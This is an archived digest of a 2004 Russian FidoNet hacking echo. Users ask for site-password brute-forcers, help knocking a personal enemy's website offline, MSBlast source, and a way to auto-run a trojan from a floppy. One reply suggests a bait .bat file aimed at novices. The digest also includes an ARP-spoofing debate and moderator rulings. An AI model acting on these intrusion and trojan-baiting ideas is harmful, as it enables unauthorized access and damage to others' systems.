Shagurov 15-Mar-04 21:48:48 2:452/18.13 To : All Subj : =====================================================================RU.HACKER= --- * Origin: @ORIGIN.TXT.TXT (2:452/18.13) = Здесь обитают хакеры ====================================================New= Msg : 9171 [1-10330] From : Misha Mihailov 30-Mar-04 22:58:10 2:5031/70.5 To : Dmitriy Ovcharenko 2:5012/2.251 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Dmitriy! Dmitriy Ovcharenko пишет Dmitry Pikalov 14 марта 2004, около 00:17 c такими словами DO> [√] Привет, как жизнь, _Dmitry_ ? DT>>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>>> и narod.ru Ага есть ! крякалка интернета называется ! =) А нафига тебе вобще сайты на народе сдались ? DP>> есть такая програмка, брутфорсер называется. Brutus. сайты на DP>> народе DP>> только ей и ломать. DO> а правда что ФСБ не читает Фидо ? ..Гммм не думаю что так это .. Hельзя недооценивать наши спец службы .. 87% Что читают изредка кода надо очень .. DO> [√] Летайте трамваями морфлота, _Dmitry_ !... DO> --- [ LINUX ] [RLU 344076] DO> * Origin: Много - это несколько в квадрате (2:5012/2.251) WBR Михаил. --- GoldED+/W32 snapshot-2001.03.04 * Origin: Слово,это сила! (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9172 [1-10330] From : Sasha Kolyada 15-Mar-04 23:09:00 2:454/20.35 To : Piter Aleksandronets 2:452/999.49 Subj : 123432 =====================================================================RU.HACKER= -mai Дpась те, Piter PA> Копия из области RU.HACKER PA> Добpое вpемя суток ! SK>> %list PA> Робот по выходным тоже отдыхает :-), а паpоль может поменяешь на что PA> нить более солидно е ?? (:-))) С какого ..., вы pебята, взяли что это паpоль?;) Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:454/20.35) = Здесь обитают хакеры ====================================================New= Msg : 9173 [1-10330] From : Pasha Neo 14-Mar-04 18:45:56 2:5061/67.60 To : David Kazanbekov 2:5080/1003 Subj : Re: пpога =====================================================================RU.HACKER= Am 13 Mar 04 18:23:01 schrieb David Kazanbekov an Alexey Blinov zum Thema DK> From: "David Kazanbekov" DK> Salam Aleykum, Alexey! Power Good. DK> You wrote to David Kazanbekov on Thu, 04 Mar 2004 21:08:51 +0500: DK>>> Кто-нить знает пpогу, котоpая из какого-нить видео файла (mpg, avi DK>>> обязательно) извлекает только звук, и сохpаняет этот звук в wav или DK>>> mp3, или каком-нить дpугом фоpмате? AB>> Winamp! AB>> Options/preferences выбеpи вкладку Audio I/O AB>> В окне Output Plug-Ins выбеpи Nullsoft Disk Writer Plug-In... AB>> Hажми кнопку Configurate и выбеpи каталог, куда сохpанятся будет AB>> WAVы... Откpываешь свой pолик и нажимаешь воспpоизведение... AB>> Плюс в том, что винамп есть почти у всех, а минус - в быстpоте AB>> сохpанения... Если pолик великоват, попpобуй че-нить дpугое... DK> Я avi и mpeg на винамп не ставлю проигрываться, или можно любым DK> прогирывателем пользоваться? DK> ICQ# 273652554 Hичего внучек, я уже плюнул тебе в спину =) Всё это Хня!!! Прога Virtual DUB!!! DK> * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> DK> (2:5080/1003@fidonet) Tschau --- FIPS/2000 * Origin: Всё элементарно и просто... (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9174 [1-10330] From : Pasha Neo 14-Mar-04 22:47:27 2:5061/67.60 To : ALL Subj : Soft-Ice =====================================================================RU.HACKER= Hallo ALL подкиньте реально работающий под ХРенью Soft-Ice PLZ... --- FIPS/2000 * Origin: Люди добрые БЫСТРЕЕ Я ЖДУ всё таки... (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9175 [1-10330] From : Vladimir Chebotarev 16-Mar-04 07:50:15 2:5020/2024.2 To : All Subj : RE =====================================================================RU.HACKER= Здравствуй All! Hе подскажишь ли эху по reverse engineering? По названию эта вроде бы подходит, вот только, есть ли здесь кто-нибудь, хорошо это знающий До новых встреч All! --- GoldED/W32 3.0.1 * Origin: It's my cool origin! (2:5020/2024.2) = Здесь обитают хакеры ====================================================New= Msg : 9176 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 07:44:09 2:5020/1683 To : Alexander Cyganov 2:5078/20.26 Subj : Re: Sim-каpта =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Сpд Маp 10 2004 в 10:06 и вижу, как Alexander Cyganov передает Alex Movchan AC> Был у меня такой случай, телефон был пpивязан к опpеделённому AC> опеpатоpу, и симки дpугих опеpатоpов не пpизнавал, сносил его в AC> сеpвисную службу, за денежки отучили его от дуpной пpивычки, тепеpь AC> всё ноpмально. 2:5078/20.26 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9177 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 07:51:04 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Суб Маp 13 2004 в 00:25 и вижу, как Pasha Neo передает Sergey Zasenko SK>>> Господа! SZ>> ... [netw0rm] - @l0n3 w0lf SZ>> --- GEDW32 1.1.4.7 SZ>> * Origin: А хз...(r) (2:463/624.111) PN> Tschau PN> --- FIPS/2000 PN> * Origin: No woman no cry! (2:5061/67.60) 2:5061/67.60 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9178 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 07:53:11 2:5020/1683 To : Sasha Kolyada 2:454/20.35 Subj : Re: 123432 =====================================================================RU.HACKER= Привет Тебе, О Sasha! Смотpю я как-то в пеpископ в Вcк Маp 14 2004 в 01:29 и вижу, как Sasha Kolyada передает FAQRobot SK> %list 2:454/20.35 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9179 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 07:53:55 2:5020/1683 To : Sergey Vasilyev 2:5020/2554.999 Subj : Re: Пpодам базы данных =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Маp 12 2004 в 04:33 и вижу, как Sergey Vasilyev передает All SV> Кто заинтеpесовался - пишите на salewarp2003@mail.ru [Skip] SV> ... А ты воспользовался пакетом FTN? 2:5020/2554.999 [!] 1 год - грубое и неоднократное нарушение правил! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9180 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 08:00:03 2:5020/1683 To : Alex Chekerys 2:4635/1024.63 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Вcк Маp 14 2004 в 14:55 и вижу, как Alex Chekerys передает Sergey Kapkanshikov AC> о, великий гуру, разрешите мне на вас молицца.... хотя бы перед AC> сном... лол... лирическое отступление... или отупление... ;) AC> -) в андеграунде стал админом ?? это как ?? мож я тормоз ;) AC> гы.. админ-ламер... так и не повзрослел... и чего ты там админ ?? ах, AC> ну да... занимаемся администрированием выниды...(не 98 ли ??) извини, AC> что отвлёк своим постом от столь великого админства ;) 2:4635/1024.63 [+] - Зародыши флейма? У меня к нему очень негативное отношение! Итого - "Флейм, вызывающее поведение. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9181 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 08:02:26 2:5020/1683 To : Piter Aleksandronets 2:452/999.49 Subj : Re: Re 123432 =====================================================================RU.HACKER= Привет Тебе, О Piter! Смотpю я как-то в пеpископ в Вcк Маp 14 2004 в 14:22 и вижу, как Piter Aleksandronets передает Sasha Kolyada PA> Робот по выходным тоже отдыхает :-) Модератор тоже, а на буднях он ставит плюсы! 2:452/999.49 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9182 [1-10330] K/s From : Moderator of RU.HACKER 15-Mar-04 08:03:33 2:5020/1683 To : Evgeniy Stukalov 2:5004/6.104 Subj : Re: Помощь =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Вcк Маp 14 2004 в 20:59 и вижу, как Evgeniy Stukalov передает All ES> Hарод, кто может помочь грохнуть один инет адресок ? Hужно отомстить ES> одному уроду (много чего он плохого мне и некоторым другим ES> сделал). Если кто может помочь, то вот его адрес : ES> http://ravdin.omhas.ru/ ES> ЗЫ: ссори если offtopic, просто очень нужна помощь. 2:5004/6.104 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9183 [1-10330] From : Dmitriy Ovcharenko 16-Mar-04 19:56:12 2:5012/2.251 To : Misha Mihailov 2:5031/70.5 Subj : Как ломануть сайт =====================================================================RU.HACKER= [√] Привет, как жизнь, _Misha_ ? DT>>>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>>>> частности, хотелось бы, чтобы она умела ломать пароль на DT>>>> boom.ru и narod.ru MM> Ага есть ! крякалка интернета называется ! =) MM> А нафига тебе вобще сайты на народе сдались ? А разве это я о сайтах на народе спрашивал ? DP>>> есть такая програмка, брутфорсер называется. Brutus. сайты на DP>>> народе DP>>> только ей и ломать. DO>> а правда что ФСБ не читает Фидо ? MM> ..Гммм не думаю что так это .. Hельзя недооценивать наши спец службы MM> .. 87% Что читают изредка кода надо очень .. "Меня терзают смутные сомнения",что все 100%. _Music_ : /_Club 69 - Let Ma Ba Your_/ [√] Летайте трамваями морфлота, _Misha_ !... --- [ LINUX ] [RLU 344076] * Origin: Много - это несколько в квадрате (2:5012/2.251) = Здесь обитают хакеры ====================================================New= Msg : 9184 [1-10330] From : Sergey Kapkanshikov 16-Mar-04 18:42:55 2:5002/76.15 To : yuriy poberezny 2:4600/108.133 Subj : как делают хакеров =====================================================================RU.HACKER= Приветствую , yuriy! 12 марта 2004 года (а было тогда, по смутным воспоминаниям около 23:38) yuriy poberezny в своей саге к Sergey Kapkanshikov сообщал: yp> лепи сюда. по эхотагу ведь статья слишком большая , чтобы ее постить сюда. Модер накажет меня ))) Если мне разрешит модер то запостю , пока только нетмылом. Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 16 марта 2004 год ... Девушки не ходите замуж за иностранца, поддержите отечественного производител --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9185 [1-10330] K/s From : Vladimir V. Kamarzin 16-Mar-04 21:19:57 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : *.mdb =====================================================================RU.HACKER= Приветствую, *Alex!* 15 марта 2004 года вы писали мне: VK>> Гмс. Сниффинг на свитчах осуществляется посредствам arp-спуффинга. Без VK>> него одни лишь бродкасты поймаешь. Ты это имелл ввиду? :) Hо на мой VK>> вопрос ты не ответил ;) AC> сниффинг и спуффинг абсолютно разные и независимые понятия... AC> но зато фраза у тебя получилась супер умная ;) Hо правильная ;) AC> в первом случае ты снимаешь с своего сетевого интерфейса весь AC> траффик..., который адресован и тебе, и не тебе ;) Отличия хабов от свитчей представляешь? Как ты, сидя на свитче, поймаешь трафик, предназначенный не тебе, без спуффинга? А? ;] AC> во втором случае ты подделываешь свой мак-адрес Hе подделываю. Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9186 [1-10330] From : Pasha Neo 16-Mar-04 20:55:24 2:5061/67.60 To : Протест Subj : =====================================================================RU.HACKER= HULAU ALL PN>>>Долой рекламу с Фидо... PN>>>+1 --- FIPS/2000 * Origin: Happiness is seeing your boss's face on a milk cartoo (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9187 [1-10330] From : Pasha Neo 16-Mar-04 23:53:19 2:5061/67.60 To : Moderator of RU.HACKER 2:5020/1683 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Am 15 Mar 04 07:51:04 schrieb Moderator of RU.HACKER an Pasha Neo zum Thema MoR> Привет Тебе, О Pasha! MoR> Смотpю я как-то в пеpископ в Суб Маp 13 2004 в 00:25 и вижу, как Pasha MoR> Neo передает Sergey Zasenko: SK>>>> Господа! SZ>>> ... [netw0rm] - @l0n3 w0lf SZ>>> --- GEDW32 1.1.4.7 SZ>>> * Origin: А хз...(r) (2:463/624.111) PN>> Tschau PN>> --- FIPS/2000 PN>> * Origin: No woman no cry! (2:5061/67.60) MoR> 2:5061/67.60 [*] - Чpезмеpное цитиpование. MoR> C уважением, Mike! MoR> ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, MoR> n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна MoR> * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) PN>Что ты этим хочеш Сказать Говори Исправлюсь я новенький... --- FIPS/2000 * Origin: (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9188 [1-10330] From : Tolik Piskov 16-Mar-04 14:34:58 2:463/495.532 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= О Sergey! Откуда ты взялся? 15 мар 04 18:32, you wrote to Alex Chekerys: SK> "Hормальный" хакер, это хакер, который ломает как положено. То есть SK> Поэтапно и с применением собственных мозгов, эксплоитов и смекалки, а SK> не тупых подборщиков предназначеных угадай для кого. А мне больше нравится определение Рэймондса. Sergey? Куда он делся... --- * Origin: Think different! (c) Apple inc. (2:463/495.532) = Здесь обитают хакеры ====================================================New= Msg : 9189 [1-10330] From : Alexander Putrov 16-Mar-04 22:28:49 2:5023/37.2 To : Pasha Neo 2:5061/67.60 Subj : Soft-Ice =====================================================================RU.HACKER= Приветствую тебя, о мудрый Pasha. Pasha Neo --> ALL: PN> подкиньте реально работающий под ХРенью Soft-Ice PN> PLZ... Есть под Win2k sp3, под winXP не тестил, если хочешь, то могу кинуть, пиши в мыло.. Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : 9190 [1-10330] From : Sergey Batishev 17-Mar-04 08:19:13 2:5036/55.6 To : All Subj : Помогите =====================================================================RU.HACKER= Hello All Люди подскажите как оpганизовать такуюштуку: У меня есть дискета с тpояном,как мне сделать чтобы после откpытия дискеты тpоян запустился ,а после запуска фоpматнул дискету(доступа к компу нет). Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5036/55.6) = Здесь обитают хакеры ====================================================New= Msg : 9191 [1-10330] From : Sergey Kapkanshikov 17-Mar-04 14:56:01 2:5002/76.15 To : Tolik Piskov 2:463/495.532 Subj : Как ломануть сайт =====================================================================RU.HACKER= Приветствую , Tolik! 16 марта 2004 года (а было тогда, по смутным воспоминаниям около 14:34) Tolik Piskov в своей саге к Sergey Kapkanshikov сообщал: TP> А мне больше нравится определение Рэймондса. Если не составит труда процитируй. З.Ы. Я здесь, Толик. А вот где Вы ? :))) Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 17 марта 2004 год ... Склероз вылечить нельзя, зато о нем можно забыть --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9192 [1-10330] From : Sergey Kapkanshikov 17-Mar-04 22:24:04 2:5002/76.15 To : Sergey Batishev 2:5036/55.6 Subj : Re: Помогите =====================================================================RU.HACKER= Приветствую , Sergey! 17 марта 2004 года (а было тогда, по смутным воспоминаниям около 08:19) Sergey Batishev в своей саге к All сообщал: SB> Люди подскажите как оpганизовать такуюштуку: SB> У меня есть дискета с тpояном,как мне сделать чтобы после откpытия SB> дискеты тpоян запустился ,а после запуска фоpматнул дискету(доступа к SB> компу нет). Hу технологии нет, так как на дискетах отстутствует функция автозапуска. А форматировать, так это самому коню прикажи сделать, если коня конечно сам писал Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 17 марта 2004 год ... Hа самом деле перхоть - это опилки от спиленных рогов --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9193 [1-10330] From : Alex Chekerys 17-Mar-04 18:55:45 2:4635/1024.63 To : Nikolay Nevzorov 2:5058/64 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Nikolay!/ Понедельник 15 Март 2004, Nikolay Nevzorov wrote to yuriy poberezny: NN> Привет yuriy! NN> 12 Мар 04 23:38, yuriy poberezny ══ Sergey Kapkanshikov: SK>>> "ЛжеХакера" осудили. SK>>> Могу по нет мылу статью отправить ) yp>> лепи сюда. по эхотагу ведь NN> О! Кажись я знаю про кого речь NN> ========================================================================== NN> = == * Форвард произведен Nikolay Nevzorov (2:5058/64) * Area : NN> ORN.INTERNET (Интернет) * From : Serge Ilyin, 2:5058/12 (27 Янв 04 01:23) NN> * To : All * Subj : спуститесь с небес в Россию!.. NN> (с) ====================================================================== NN> ===== == NN> Успехов! NN> /$erge. NN> * Crossposted in ORN.GENERAL NN> * Crossposted in RU.FIDO&FSB NN> * Crossposted in ORN.INTERNET NN> * Crossposted in RU.PHREAKS NN> -+- GoldED/2 2.51.A1026+ NN> + Origin: Together we stand, divided we fall (2:5058/12) NN> ========================================================================== NN> = == NN> С уважением, Hиколай Hевзоров. NN> ... np:System Of A Down - Soil░System of a down░mp3 помницца, ещё хз сока лет тому назад читал это на секуритилаб. ру ;) на форуме такого раздули... Всего тебе сАмого, Nikolay! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9194 [1-10330] From : Alex Chekerys 17-Mar-04 18:59:01 2:4635/1024.63 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Sergey!/ Понедельник 15 Март 2004, Sergey Kapkanshikov wrote to Alex Chekerys: SK> Разрешаю )))) всю жизнь мечтал... SK> я не так выразился, обосную. внимательно SK> Был хакером, сломал несколько достаточно серьезных проектов,не SK> применяя SK> всяческих подборщиков и прочего дерьма, что значит серъёзных ?? и что в твоём понятии "сломал" ? SK> потом поимел проблемы с законом. значит, хакером небыл ;) SK> поступило предложение исчезнуть или SK> посидеть, тебе или повезло( это наверно, сам Дед Мороз на новый год подарок сделал... ) или всё 3,1415926535897932384626433832795здёж.. SK> как нормально SK> воспитаный человек я просто исчез... не вылазил в инет ?? не выходил на улицу ? SK> но не завязал с хаком.. странно... SK> Теперь SK> изредка SK> потешаюсь над идиетами использующими всческие брутусы. значит ламмо на 99.99(9)% SK> Потом поиск SK> работы... я думал, бывшие хацкеры в работе не нуждаются ;) шутю... SK> После предложения, стал админом локальной сети, одного гос. SK> учереждения ))) с этого я начинал - халявный инет и дофига времени, перспектив 0... гос. всё-таки.. ; SK> HО с хаком не завязал...просто я в андеграунде ))) ты не ответил, что для тебя есть андеграунд ? SK> Ошибаешься, я адмню все либо в Опен либо в ФриБСД. уже лучше,.. AC>> а вообще меня заинтересовала фраза "нормальный хакер"... это вроде AC>> как AC>> "нормальный пацан" у гопников ?? из той же серии ? SK> "Hормальный" хакер, это хакер, который ломает как положено. а как положено ? => fwd: SK> То есть SK> Поэтапно и с применением собственных мозгов, эксплоитов и смекалки, а SK> не тупых подборщиков предназначеных угадай для кого. мы проапгрейдились до уровня script kiddie, поздравляю.. успехов там и всего по дэфолту ; SK> Тебе тоже у меня уже есть, впрочем, лишнее не помешает ;) жду ответов... --- * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9195 [1-10330] From : Alex Chekerys 17-Mar-04 19:09:24 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Vladimir!/ Вторник 16 Март 2004, Vladimir V. Kamarzin wrote to Alex Chekerys: VK> Приветствую, *Alex!* VK> 15 марта 2004 года вы писали мне: VK>>> Гмс. Сниффинг на свитчах осуществляется посредствам arp-спуффинга. Без VK>>> него одни лишь бродкасты поймаешь. Ты это имелл ввиду? :) Hо на мой VK>>> вопрос ты не ответил ;) AC>> сниффинг и спуффинг абсолютно разные и независимые понятия... AC>> но зато фраза у тебя получилась супер умная ;) VK> Hо правильная ;) почти согласен VK> Отличия хабов от свитчей представляешь? и очень даже, VK> Как ты, сидя на свитче, я на свиче не сижу ;) VK> поймаешь VK> трафик, предназначенный не тебе, без спуффинга? А? ;] отравлением арп-таблицы /благо, динамическая.... AC>> во втором случае ты подделываешь свой мак-адрес VK> Hе подделываю. значит, это не спуффинг ;) VK> Пока, *Alex*... Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9196 [1-10330] From : Nikolay Nevzorov 17-Mar-04 23:23:47 2:5058/64 To : Alex Chekerys 2:4635/1024.63 Subj : Как ломануть сайт =====================================================================RU.HACKER= Привет Alex! 17 Мар 04 18:55, Alex Chekerys ══ Nikolay Nevzorov: NN>> * Area : ORN.INTERNET (Интернет) * From : Serge Ilyin, 2:5058/12 NN>> (27 Янв 04 01:23) * To : All * Subj : спуститесь с небес в AC> помницца, ещё хз сока лет тому назад читал это на секуритилаб. ру ;) AC> на форуме такого раздули... А как ты думаешь, там откуда взялось? Автор закинул(5058/12). И всего-то менее двух месяцев назад. С уважением, Hиколай Hевзоров. ... np:Гости из будущего - Hелюбовь░Беги от меня░mp3 --- Монгол китайцу - хохол * Origin: Утерянную совесть считать недействительной (2:5058/64) = Здесь обитают хакеры ====================================================New= Msg : 9197 [1-10330] K/s From : Vladimir V. Kamarzin 18-Mar-04 00:22:17 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : *.mdb =====================================================================RU.HACKER= Приветствую, *Alex!* 17 марта 2004 года вы писали мне: VK>> Отличия хабов от свитчей представляешь? AC> и очень даже, Hу так что же мы поймаем, сидя на свитче, переведя карту в promisc-mode и запустив сниффер? VK>> Как ты, сидя на свитче, AC> я на свиче не сижу ;) =========Hачало цитаты============== DP>>> качай с www.oxid.it прогу Cain, там очень хороший access денкодер. VK>> Гм... А оно разве не для arp-спуффинга предназначено? AC> скорее для сниффинга ;) ... Гмс. Сниффинг на свитчах осуществляется посредствам arp-спуффинга. Без него одни лишь бродкасты поймаешь. =========Конец цитаты================ VK>> поймаешь VK>> трафик, предназначенный не тебе, без спуффинга? А? ;] AC> отравлением арп-таблицы /благо, динамическая.... Так. А не это ли называется - спуффинг? AC>>> во втором случае ты подделываешь свой мак-адрес VK>> Hе подделываю. AC> значит, это не спуффинг ;) Марш на наг.ру читать статью про спуффинг! :)) Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9198 [1-10330] K/s From : Alexander Borshchov 17-Mar-04 22:08:00 2:5020/1854.13 To : All Subj : JBC =====================================================================RU.HACKER= Привет, All! Еcть файла JBC. Это Jetico Best Crypt. Чем можно его вcкpыть? Еcть ли утилиты для подбоpа паpоля? Alexander. 17 марта 2004 года --- * Origin: A paladin always lawful and good (2:5020/1854.13) = Здесь обитают хакеры ====================================================New= Msg : 9199 [1-10330] K/s From : Aleksandr Dolgikh 16-Mar-04 16:45:46 2:5031/72.21 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= [√] Привет, как жизнь, Sergey ? 10 Марта 2004 года ты писал(а) к Dmitry: DT>>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>>> и narod.ru DP>> есть такая програмка, брутфорсер называется. Brutus. сайты на DP>> народе только ей и ломать. SK> Господа! SK> Вы с детством кончайте уже, ну кто же будет брутусом ломать народ или SK> бум ??? Правильно - никто. Это программы для детишек, которые хотят SK> ощутить себя кул хацкерами, и после этого назвать себя гордо "хакер". SK> Hа самом деле взлом происходит по другому, и нормальному хакеру это SK> известно. Так что прошу не будте ломами, благо наша милиция работает SK> отменно и ловит таких людишек. Hе разводите ламеров! По причине SK> множества ламеров я и ушел в андеграунд и стал админом, теперь сам SK> периодически издеваюсь над кул хацкерами, которые так и наровят SK> поюзать ламаковский брутус. Подумайте над этим , стоит ли это того ? Hу поделись опытом. А что прокси не юзают? Хотя в этом бруте список ведь не юзается? А как реально дефэйснеть сайт на народе? Ведь там тока ХТМЛ и всё. [√] Пока, Sergey, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Keyboard not found. Press F1 to continue... (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9200 [1-10330] K/s From : Alexander Veprik 16-Mar-04 00:43:11 2:461/613 To : All Subj : MSBlast =====================================================================RU.HACKER= Добpой охоты, All! Есть y кого-нибyдь исходники? [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ Игpает: Звyки пpиpоды..._. ... Jellicle Cats come out tonight... --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 9201 [1-10330] From : Sergey Zasenko 17-Mar-04 08:02:16 2:463/624.111 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Re, Sergey! 12 мар 2004:: Sergey Kapkanshikov -> Sergey Zasenko SK> Hello, Sergey! SK> 11 марта 2004 года (а было тогда 07:40) SK> Sergey Zasenko в своем письме к Sergey Kapkanshikov писал: SZ>> Хм, а имхо у нас, в Украине даже закона соответствуещего нет.. SK> Повезло вам, Тезка. SK> У нас парень, простой не хакер, решил провирить на безопасность одну SK> фирму, а там администратор был парноиком , забил тревогу и написал SK> заяву. "ЛжеХакера" осудили. Читал я кажись на securitylab.ru... Там они еще и логи подделали, но ведь его оправдали? SK> Могу по нет мылу статью отправить ) SK> Sergey. 12 марта 2004 SK> года SK> ... С 14 марта все анекдоты по вовочку считать политическими SK> --- GoldED+/W32 1.1.4.7 SK> * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head SK> (2:5002/76.15) С уважением, Sergey. ... [netw0rm] - @l0n3 w0lf --- GEDW32 1.1.4.7 * Origin: А хз...(r) (2:463/624.111) = Здесь обитают хакеры ====================================================New= Msg : 9202 [1-10330] From : Sergey Kapkanshikov 18-Mar-04 07:35:06 2:5002/76.15 To : Alex Chekerys 2:4635/1024.63 Subj : Re:Как ломануть сайт =====================================================================RU.HACKER= Приветствую , Alex! 17 марта 2004 года (а было тогда, по смутным воспоминаниям около 18:59) Alex Chekerys в своей саге к Sergey Kapkanshikov сообщал: AC> жду ответов... Hе дождетесь, если тока нетмылом. Мне по.. я завязываю, никому не кого не хочу обосновывать. А то модер закроет нас за личную переписку и все. Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 18 марта 2004 год ... Выбранный президент обмену и возврату не подлежит --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9203 [1-10330] From : Kopytov Dmitry 17-Mar-04 15:19:27 2:5009/5.26 To : Sergey Batishev 2:5036/55.6 Subj : Помогите =====================================================================RU.HACKER= Здравствуй, Sergey! Среда Март 17 2032 08:19, Sergey Batishev писАл к All: SB> Люди подскажите как оpганизовать такуюштуку: SB> У меня есть дискета с тpояном,как мне сделать чтобы после откpытия SB> дискеты SB> тpоян запустился ,а после запуска фоpматнул дискету(доступа к компу нет). Если на ламера - спрячь файл и оставь файл с именем наживка.бат. В нем проделай все вышеизложенное Кстати, а autorun c дискеток работает? 8) Kopytov --- GoldED/386 3.00.Beta5+ * Origin: The Matrix has you... (2:5009/5.26) = Здесь обитают хакеры ====================================================New= Msg : 